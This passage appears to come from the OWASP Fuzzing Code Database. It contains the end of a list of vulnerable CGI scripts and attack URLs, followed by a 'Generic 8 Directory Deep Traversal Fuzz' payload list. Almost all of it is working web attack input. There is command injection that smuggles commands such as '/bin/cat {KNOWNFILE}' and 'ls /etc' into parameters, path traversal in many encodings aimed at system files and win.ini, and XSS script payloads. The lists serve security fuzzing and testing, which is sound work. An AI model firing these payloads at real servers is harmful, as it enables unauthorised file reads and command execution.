gettransbitmap<br />
glimpse<br />
gm-authors.cgi<br />
gm-cplog.cgi<br />
gm.cgi<br />
guestbook.cgi<br />
guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|<br />
guestbook.pl<br />
guestbook/passwd<br />
handler.cgi<br />
hitview.cgi<br />
horde/test.php<br />
horde/test.php?mode=phpinfo<br />
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00<br />
htgrep?file=index.html&hdr={KNOWNFILE}<br />
html2chtml.cgi<br />
html2wml.cgi<br />
htmlscript?../../../../../../../../../..{KNOWNFILE}<br />
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E<br />
htsearch?-c/nonexistant<br />
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=<br />
htsearch?exclude=%60{KNOWNFILE}%60<br />
ibill.pm<br />
icat<br />
if/admin/nph-build.cgi<br />
ikonboard/help.cgi?<br />
imageFolio.cgi<br />
imagefolio/admin/admin.cgi<br />
imagemap<br />
include/new-visitor.inc.php<br />
index.js0x70<br />
index.pl<br />
info2www<br />
info2www '(../../../../../../../bin/mail root <{KNOWNFILE}><br />
infosrch.cgi<br />
ion-p?page=../../../../..{KNOWNFILE}<br />
jailshell<br />
jj<br />
journal.cgi?folder=journal.cgi%00<br />
ksh<br />
lastlines.cgi?process<br />
listrec.pl<br />
loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}<br />
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
log-reader.cgi<br />
log/<br />
log/nether-log.pl?checkit<br />
login.cgi<br />
login.pl<br />
login.pl?course_id=\<br />
logit.cgi<br />
logs.pl<br />
logs/<br />
logs/access_log<br />
logs/error_log<br />
lookwho.cgi<br />
ls<br />
lwgate<br />
lwgate.cgi<br />
magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../..{KNOWNFILE}<br />
mail<br />
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00<br />
mailit.pl<br />
maillist.cgi<br />
maillist.pl<br />
mailnews.cgi<br />
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}<br />
majordomo.pl<br />
man2html<br />
mastergate/search.cgi?search=0&search_on=all<br />
meta.pl<br />
mgrqcgi<br />
mini_logger.cgi<br />
mmstdod.cgi<br />
moin.cgi?test<br />
mojo/mojo.cgi<br />
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
mrtg.cgi?cfg=blah<br />
ms_proxy_auth_query/<br />
mt-static/<br />
mt-static/mt-check.cgi<br />
mt-static/mt-load.cgi<br />
mt-static/mt.cfg<br />
mt/<br />
mt/mt-check.cgi<br />
mt/mt-load.cgi<br />
mt/mt.cfg<br />
multihtml.pl?multi={KNOWNFILE}%00html<br />
musicqueue.cgi<br />
myguestbook.cgi?action=view<br />
namazu.cgi<br />
nbmember.cgi?cmd=list_all_users<br />
netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}<br />
netpad.cgi<br />
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}<br />
nimages.php<br />
nlog-smb.cgi<br />
nlog-smb.pl<br />
non-existent.pl<br />
noshell<br />
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
nph-error.pl<br />
nph-exploitscanget.cgi<br />
nph-maillist.pl<br />
nph-publish<br />
nph-publish.cgi<br />
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0<br />
nph-test-cgi<br />
ntitar.pl<br />
opendir.php?{KNOWNFILE}<br />
orders/orders.txt<br />
pagelog.cgi<br />
pals-cgi?palsAction=restart&documentName={KNOWNFILE}<br />
parse-file<br />
pass<br />
passwd<br />
passwd.txt<br />
password<br />
pbcgi.cgi?name=Joe%Camel&email=%3C<br />
perl<br />
perl?-v<br />
perlshop.cgi<br />
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}<br />
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'<br />
phf<br />
phf.cgi?QALIA<br />
phf?Qname=root%0Acat%20{KNOWNFILE}%20<br />
photo/<br />
photo/manage.cgi<br />
photo/protected/manage.cgi<br />
php-cgi<br />
php.cgi?{KNOWNFILE}<br />
plusmail<br />
pollit/Poll_It_<br />
pollssi.cgi<br />
post-query<br />
post_query<br />
postcards.cgi<br />
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
printenv<br />
printenv.tmp<br />
probecontrol.cgi?command=enable&username=cancer&password=killer<br />
processit.pl<br />
profile.cgi<br />
pu3.pl<br />
publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10<br />
query<br />
query?mss=%2e%2e/config<br />
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id=<br />
quikstore.cfg<br />
quizme.cgi<br />
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}<br />
ratlog.cgi<br />
redirect<br />
register.cgi<br />
replicator/webpage.cgi/<br />
responder.cgi<br />
retrieve_password.pl<br />
rksh<br />
rmp_query<br />
robadmin.cgi<br />
robpoll.cgi<br />
rpm_query<br />
rsh<br />
rtm.log<br />
rwcgi60<br />
rwcgi60/showenv<br />
rwwwshell.pl<br />
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1<br />
sawmill?rfcf+%22<br />
sbcgi/sitebuilder.cgi<br />
scoadminreg.cgi<br />
scripts/*%0a.pl<br />
search.cgi<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini<br />
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini<br />
search.php?searchstring=<script>alert(document.cookie)</script><br />
search.pl<br />
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script><br />
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00<br />
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc<br />
sendform.cgi<br />
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message<br />
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}<br />
session/adminlogin<br />
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}<br />
sh<br />
shop.cgi?page=../../../../../../..{KNOWNFILE}<br />
shop.pl/page=;cat%20shop.pl|<br />
shop/auth_data/auth_user_file.txt<br />
shop/orders/orders.txt<br />
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}<br />
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}|<br />
show.pl<br />
showcheckins.cgi?person=<script>alert('XSS')</script><br />
showuser.cgi<br />
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|<br />
simplestguest.cgi<br />
simplestmail.cgi<br />
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|<br />
sojourn.cgi?cat=../../../../../../../../../../etc/password%00<br />
spin_client.cgi?aaaaaaaa<br />
ss<br />
sscd_suncourier.pl<br />
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}<br />
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E<br />
stat.pl<br />
stat/<br />
stats-bin-p/reports/index.html<br />
stats.pl<br />
stats.prf<br />
stats/<br />
stats/statsbrowse.asp?filepath=c:\&Opt=3<br />
stats_old/<br />
statsconfig<br />
statusconfig.pl<br />
statview.pl<br />
store.cgi?<br />
store/agora.cgi?cart_id=<script>alert('XSS')</script><br />
store/agora.cgi?page=whatever33.html<br />
store/index.cgi?page=../../../../../../../..{KNOWNFILE}<br />
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00<br />
survey<br />
survey.cgi<br />
sws/admin.html<br />
sws/manager.pl<br />
tablebuild.pl<br />
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1<br />
tcsh<br />
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE}<br />
test-cgi.tcl<br />
test-cgi?/*<br />
test-env<br />
test.cgi<br />
test/test.cgi<br />
texis/junk<br />
texis/phine<br />
textcounter.pl<br />
tidfinder.cgi<br />
tigvote.cgi<br />
title.cgi<br />
tpgnrock<br />
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}<br />
troops.cgi<br />
ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE}<br />
ultraboard.cgi<br />
ultraboard.pl<br />
unlg1.1<br />
unlg1.2<br />
update.dpgs<br />
upload.cgi<br />
uptime<br />
urlcount.cgi?%3CIMG%20<br />
ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE}<br />
utm/admin<br />
utm/utm_stat<br />
view-source<br />
view-source?view-source<br />
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00<br />
viewcvs.cgi/viewcvs/?cvsroot=<script>alert('XSS')</script><br />
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\<br />
viewlogs.pl<br />
viewsource?{KNOWNFILE}<br />
viralator.cgi<br />
virgil.cgi<br />
vote.cgi<br />
vpasswd.cgi<br />
vq/demos/respond.pl?<script>alert('XSS')</script><br />
w3-msql<br />
w3-sql<br />
wais.pl<br />
way-board.cgi?db={KNOWNFILE}%00<br />
way-board/way-board.cgi?db={KNOWNFILE}%00<br />
webais<br />
webbbs.cgi<br />
webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE}<br />
webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE<br />
webdist.cgi?distloc=;cat%20{KNOWNFILE}<br />
webdriver<br />
webgais<br />
webif.cgi<br />
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00<br />
webmap.cgi<br />
webnews.pl<br />
webplus?about<br />
webplus?script=../../../../../../../../../..{KNOWNFILE}<br />
websendmail<br />
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}<br />
webutil.pl<br />
webutils.pl<br />
webwho.pl<br />
where.pl?sd=ls%20/etc<br />
whois.cgi?action=load&whois=%3Bid<br />
whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE}<br />
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}<br />
windmail<br />
wrap<br />
wrap.cgi<br />
ws_ftp.ini<br />
www-sql<br />
wwwadmin.pl<br />
wwwboard.cgi.cgi<br />
wwwboard.pl<br />
wwwstats.pl<br />
wwwthreads/3tvars.pm<br />
wwwthreads/w3tvars.pm<br />
wwwwais<br />
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00<br />
zsh<br />
</pre><br />
<br />
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===<br />
<pre><br />
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) <br />
# Derived from the awesome "Directory Traversal Fuzzing Code" v0.2 by Luca Carettoni<br />
# Did some cleanup & removed anything to the right of {FILE} for inclusion in a<br />
# separate fuzzfile for more flexibility, for the OWASP Fuzzing Code Database.<br />
# adam.muntner@uietmove.com <br />
<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
..%c0%af{FILE}<br />
..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}<br />
%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}<br />
%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}<br />
..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}<br />
..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}<br />
%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}<br />
%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
